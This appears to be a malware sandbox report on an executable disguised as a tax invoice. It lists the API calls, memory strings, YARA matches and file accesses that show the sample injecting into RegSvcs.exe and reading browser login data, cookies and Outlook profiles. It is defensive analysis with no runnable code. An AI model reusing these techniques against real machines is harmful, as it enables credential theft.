Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E8EF95
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E8F0F2
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E8F3F3
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E837EF
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E83B12
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E8BCBC
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00E249A0
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: RegSvcs.exe, 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd6f1bd0b1aa93<
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: RegSvcs.exe, 00000002.00000002.3701305566.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: RegSvcs.exe, 00000002.00000002.3704002615.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E93F09 BlockInput, 0_2_00E93F09
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00E23B3A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E55A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00E55A7C
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E24B37 LoadLibraryA,GetProcAddress, 0_2_00E24B37
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_01662308 mov eax, dword ptr fs:[00000030h] 0_2_01662308
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_01663928 mov eax, dword ptr fs:[00000030h] 0_2_01663928
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_01663988 mov eax, dword ptr fs:[00000030h] 0_2_01663988
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 0_2_00E780A9
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E4A155
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4A124 SetUnhandledExceptionFilter, 0_2_00E4A124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 912008
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E787B1 LogonUserW, 0_2_00E787B1
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E23B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00E23B3A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00E248D7
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E84C7F mouse_event, 0_2_00E84C7F
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe"
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E77CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00E77CAF
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E7874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00E7874B
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E4862B cpuid 0_2_00E4862B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E54E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00E54E87
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E61E06 GetUserNameW, 0_2_00E61E06
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E53F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00E53F3A
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00E249A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_81
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_XP
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_XPe
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_VISTA
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_7
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: WIN_8
Source: (STC) Tax Invoice 25030216_REV.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000002.00000002.3702479918.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3702479918.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.(STC) Tax Invoice 25030216_REV.exe.3830000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.3700812554.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1238598112.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: (STC) Tax Invoice 25030216_REV.exe PID: 6796, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 604, type: MEMORYSTR
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E96283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00E96283
Source: C:\Users\user\Desktop\(STC) Tax Invoice 25030216_REV.exe Code function: 0_2_00E96747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00E96747